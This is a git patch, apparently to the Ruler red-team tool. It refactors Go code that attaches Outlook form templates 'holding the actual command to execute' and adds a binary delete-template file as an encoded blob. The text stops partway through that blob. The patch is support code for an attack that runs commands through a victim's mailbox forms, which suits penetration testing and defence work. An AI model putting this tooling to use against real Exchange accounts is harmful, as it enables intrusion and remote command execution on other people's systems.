From e33a4fccf4928a193769f1a50605ecef6584a35e Mon Sep 17 00:00:00 2001
From: Etienne Stalmans <etienne@sensepost.com>
Date: Wed, 3 May 2017 14:32:30 +0100
Subject: [PATCH 1/4] fix utils, read unicode string index out of bounds

---
 forms/rulerforms.go              |  12 ++++++++++--
 templates/formdeletetemplate.bin | Bin 0 -> 43013 bytes
 utils/utils.go                   |   4 ++--
 3 files changed, 12 insertions(+), 4 deletions(-)
 create mode 100644 templates/formdeletetemplate.bin

diff --git a/forms/rulerforms.go b/forms/rulerforms.go
index 22ec793..174a6e4 100644
--- a/forms/rulerforms.go
+++ b/forms/rulerforms.go
@@ -32,7 +32,16 @@ func CreateFormAttachmentPointer(folderid, messageid []byte) error {
 
 //CreateFormAttachmentTemplate creates the template attachment holding the actual command to execute
 func CreateFormAttachmentTemplate(folderid, messageid []byte, pstr string) error {
+	return CreateFormAttachmentWithTemplate(folderid, messageid, pstr, "templates/formtemplate.bin")
+}
+
+//CreateFormAttachmentForDeleteTemplate creates the template attachment holding the actual command to execute
+func CreateFormAttachmentForDeleteTemplate(folderid, messageid []byte, pstr string) error {
+	return CreateFormAttachmentWithTemplate(folderid, messageid, pstr, "templates/formdeletetemplate.bin")
+}
 
+//CreateFormAttachmentWithTemplate creates a form with a specific template
+func CreateFormAttachmentWithTemplate(folderid, messageid []byte, pstr, templatepath string) error {
 	utils.Info.Println("Create Form Template Attachment")
 
 	attachmentPropertyTags := make([]mapi.TaggedPropertyValue, 4)
@@ -43,8 +52,7 @@ func CreateFormAttachmentTemplate(folderid, messageid []byte, pstr string) error
 	res, _ := mapi.CreateMessageAttachment(folderid, messageid, attachmentPropertyTags)
 
 	//read the template file for our payload
-	path := "templates/formtemplate.bin"
-	datafull, err := utils.ReadFile(path)
+	datafull, err := utils.ReadFile(templatepath)
 	if err != nil {
 		utils.Error.Println(err)
 		if os.IsNotExist(err) {
diff --git a/templates/formdeletetemplate.bin b/templates/formdeletetemplate.bin
new file mode 100644
index 0000000000000000000000000000000000000000..60016b03e7e17f74530bf79b9cea37bcf65d3901
GIT binary patch
literal 43013
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
